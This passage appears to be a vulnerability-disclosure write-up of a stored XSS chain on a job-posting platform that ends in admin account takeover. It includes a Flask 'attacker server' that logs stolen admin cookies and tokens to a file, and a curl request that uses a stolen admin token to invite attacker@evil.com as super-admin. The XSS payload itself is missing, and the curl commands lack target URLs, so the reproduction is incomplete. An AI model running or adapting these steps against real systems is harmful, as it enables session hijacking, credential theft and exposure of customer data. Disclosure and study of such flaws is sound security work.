Step-by-Step Reproduction
Step 1: Create Malicious Job Posting
bash
curl -X POST \
-H "Authorization: Bearer RECRUITER_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"title": "Senior Security Engineer",
"description": "
",
"location": "Brussels",
"department": "IT"
}'Step 2: Wait for Admin Review
Job postings required admin approval before going live. When admin clicked “Preview”:
- XSS fired in admin context
- Admin session cookie exfiltrated
- Admin localStorage token captured
Step 3: Session Hijacking
python
# Attacker server receiving exfiltrated data
from flask import Flask, requestapp = Flask(__name__)
@app.route('/steal')
def steal():
cookie = request.args.get('cookie')
token = request.args.get('local')
# Log stolen credentials
with open('stolen_creds.txt', 'a') as f:
f.write(f"Cookie: {cookie}\nToken: {token}\n\n")
return "OK"
if __name__ == '__main__':
app.run(port=443)
Step 4: Admin Invitation
Using stolen admin token:
bash
curl -X POST \
-H "Authorization: Bearer STOLEN_ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d '{
"email": "attacker@evil.com",
"role": "super_admin",
"name": "Security Audit"
}'Response: {"invite_sent": true, "invite_id": "inv_884721"}
Step 5: Account Takeover Complete
Attacker accepts invitation, sets password, logs in as super-admin.
Impact:
- Access to all customer data (500+ companies)
- Ability to modify job postings across platform
- Access to billing information
- Ability to delete or modify user accounts
